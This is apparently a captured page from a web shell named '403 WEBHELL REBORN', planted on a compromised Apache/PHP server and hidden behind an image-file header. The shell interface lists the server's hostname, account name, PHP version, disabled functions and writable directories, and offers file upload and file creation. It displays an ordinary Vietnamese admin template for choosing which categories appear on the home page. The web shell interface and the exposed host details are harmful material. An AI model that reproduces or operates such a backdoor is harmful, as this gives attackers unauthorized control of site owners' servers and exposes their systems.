ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache/2
System : Linux vps.phamthanh.local 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User : benhviencoc7 ( 1008)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Directory :  /home/benhviencoc7/public_html/adminvn/templates/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /home/benhviencoc7/public_html//////adminvn/templates/cp_12_4.html
<!-- BEGIN: cp_12_4 -->
<div class="row">
  <script type="text/javascript">  
    $().ready(function() {  
        $('#add').click(function() {  
            return !$('#select1 option:selected').remove().appendTo('#select2');  
        });  
        $('#remove').click(function() {  
            return !$('#select2 option:selected').remove().appendTo('#select1');  
        });  
        $('form').submit(function() {
            $('#select2 option').each(function(i) {
                $(this).attr("selected", "selected");
            });
        });
    });  
</script> 
          <div class="col-lg-12">
            <h1>Danh mục hiển thị tại trang chủ</h1>
            <div class="row">
              <form action="home.php" method="post">
              <div class="col-lg-6">
                <div class="main-box" style="height: 359px;">
                  <div class="clearfix">
                    <h2 class="pull-left">Danh mục chưa hiển thị</h2>
                  </div>
                  <select multiple="true" id="select1" class="form-control" style="height: 200px;">
                        <!-- BEGIN: home_hide -->
                        <option value="{mod_id}">{mod_name}</option>
                        <!-- END: home_hide -->
                    </select>
                    <p align="center"><a href="#" id="add">Cho hiển thị &gt;&gt;</a></p>
                </div>
              </div>

              <div class="col-lg-6">
                <div class="main-box">
                  <div class="clearfix">
                    <h2 class="pull-left">Danh mục đã hiển thị</h2>
                  </div>
                    <select multiple="true" id="select2" name="show[]" class="form-control" style="height: 200px;">
                        <!-- BEGIN: home_show -->
                        <option value="{mod_id}">{mod_name}</option>
                        <!-- END: home_show -->
                    </select>
                    <p align="center"><a href="#" id="remove">&lt;&lt; Tắt hiển thị</a></p>
                    <p class="progress-demo"><button class="btn btn-danger ladda-button" data-style="expand-left"><span class="ladda-label">Cập nhật</span></button></p>
                    
                  </form>

                </div>
              </div>
            </div>
  
            
          </div>
        </div>
        
<!-- END: cp_12_4 -->

Anon7 - 2021